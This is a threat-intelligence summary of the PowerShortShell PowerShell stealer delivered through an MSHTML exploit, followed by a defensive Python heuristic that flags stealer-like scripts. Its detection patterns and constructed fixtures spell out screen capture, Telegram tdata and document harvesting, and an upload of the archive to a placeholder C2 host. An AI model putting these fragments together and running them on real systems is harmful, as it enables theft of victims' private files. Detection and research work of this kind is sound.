Author: Tomer Bar, Director of Security Research, SafeBreach

SafeBreach Labs discovered a new Iranian threat actor using a Microsoft MSHTML Remote Code Execution (RCE) exploit to infect Farsi-speaking victims with a new PowerShell stealer. The threat actor initiated the attack in mid-September 2021, and it was first reported by ShadowChasing on Twitter. However, the PowerShell stealer's hash and code were not published and were not included in VirusTotal or other public malware repositories.

SafeBreach Labs analyzed the full attack chain, discovered new phishing attacks that started in July this year, and obtained the last and most interesting piece of the puzzle: the PowerShell stealer code, which we named PowerShortShell. We chose this name because the stealer is a short PowerShell script with powerful collection capabilities: in only ~150 lines it provides the adversary a great deal of critical information, including screen captures, Telegram files, collected documents, and extensive data about the victim's environment.

Almost half of the victims are located in the United States. Based on the content of the Microsoft Word document, which blames Iran's leader for the "Corona massacre", and on the nature of the collected data, we assume that the victims might be Iranians who live abroad and might be seen as a threat to Iran's Islamic regime.
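As an added, defender-side example (not code from the SafeBreach article and not the PowerShortShell sample itself), the triage heuristic below tags PowerShell script text, such as a script block recovered from logging, with the collection capabilities the summary attributes to the stealer (screen capture, Telegram files, document harvesting, host data) plus an exfiltration stage, and turns the combination into a verdict. Every signature pattern and all three fixture scripts are constructed assumptions for this example; since the real stealer's code and hash were not published, nothing here is an indicator taken from the actual sample.

```python
import re

# Hypothetical capability signatures for static triage of PowerShell script text.
# They are generic patterns for the kinds of collection the article attributes to
# PowerShortShell (screen capture, Telegram files, documents, host data) plus an
# exfiltration stage; they are assumptions for this example, not indicators
# extracted from the real sample.
CAPABILITIES = {
    "screen_capture": [
        r"CopyFromScreen",
        r"System\.Drawing\.Bitmap",
        r"Graphics\]::FromImage",
    ],
    "telegram_files": [
        r"Telegram\s*Desktop",
        r"\btdata\b",
    ],
    "document_collection": [
        r"\*\.(docx?|xlsx?|pptx?|pdf|txt)\b",
        r"Get-ChildItem[^\n]*-Recurse",
    ],
    "host_recon": [
        r"\bsysteminfo\b",
        r"Get-WmiObject",
        r"Get-CimInstance",
        r"\$env:USERNAME",
        r"\$env:COMPUTERNAME",
    ],
    "exfiltration": [
        r"Invoke-WebRequest",
        r"Invoke-RestMethod",
        r"Net\.WebClient",
        r"UploadFile",
        r"Compress-Archive",
    ],
}

COLLECTION_CAPS = {"screen_capture", "telegram_files", "document_collection"}


def classify(script_text):
    """Map each capability to the signature patterns that matched in the script."""
    hits = {}
    for capability, patterns in CAPABILITIES.items():
        matched = [p for p in patterns if re.search(p, script_text, re.IGNORECASE)]
        if matched:
            hits[capability] = matched
    return hits


def triage(script_text):
    """Score a script: exfiltration plus two or more collection capabilities is
    stealer-like; any two capabilities warrant analyst review; otherwise low."""
    hits = classify(script_text)
    collection = COLLECTION_CAPS & hits.keys()
    if "exfiltration" in hits and len(collection) >= 2:
        verdict = "stealer-like"
    elif len(hits) >= 2:
        verdict = "review"
    else:
        verdict = "low"
    return {"capabilities": sorted(hits), "verdict": verdict}


# Constructed fixtures (not real scripts): fragments with placeholder arguments.
INVENTORY_SCRIPT = r"""
# Constructed: IT asset inventory
$os = Get-CimInstance Win32_OperatingSystem
$os | Export-Csv -Path "C:\inventory\$env:COMPUTERNAME.csv"
"""

BACKUP_SCRIPT = r"""
# Constructed: nightly document backup to an internal server
$docs = Get-ChildItem $env:USERPROFILE\Documents -Include *.docx,*.pdf -Recurse
Compress-Archive -Path $docs -DestinationPath backup.zip
Invoke-RestMethod -Uri <BACKUP-SERVER-PLACEHOLDER> -Method Post -InFile backup.zip
"""

STEALER_LIKE_FRAGMENTS = r"""
# Constructed: capability fragments resembling a short collection script
$bmp = New-Object System.Drawing.Bitmap <W>, <H>
$gfx = [System.Drawing.Graphics]::FromImage($bmp)
$gfx.CopyFromScreen(<...>)
$tg = Get-ChildItem "$env:APPDATA\Telegram Desktop\tdata" -Recurse
$docs = Get-ChildItem $env:USERPROFILE -Include *.docx,*.pdf -Recurse
Compress-Archive -Path <...> -DestinationPath <ARCHIVE-PLACEHOLDER>
Invoke-WebRequest -Uri <C2-PLACEHOLDER> -Method Post -InFile <ARCHIVE-PLACEHOLDER>
"""

if __name__ == "__main__":
    for name, text in [("inventory", INVENTORY_SCRIPT),
                       ("backup", BACKUP_SCRIPT),
                       ("fragments", STEALER_LIKE_FRAGMENTS)]:
        print(name, triage(text))
```

The verdict deliberately keys on the combination rather than any single cmdlet: the backup fixture hits document collection and an upload but only reaches "review", because legitimate administration scripts use the same building blocks, while the fragment fixture reaches "stealer-like" only because three distinct collection categories coincide with an exfiltration stage in one short script, which is the profile the summary describes.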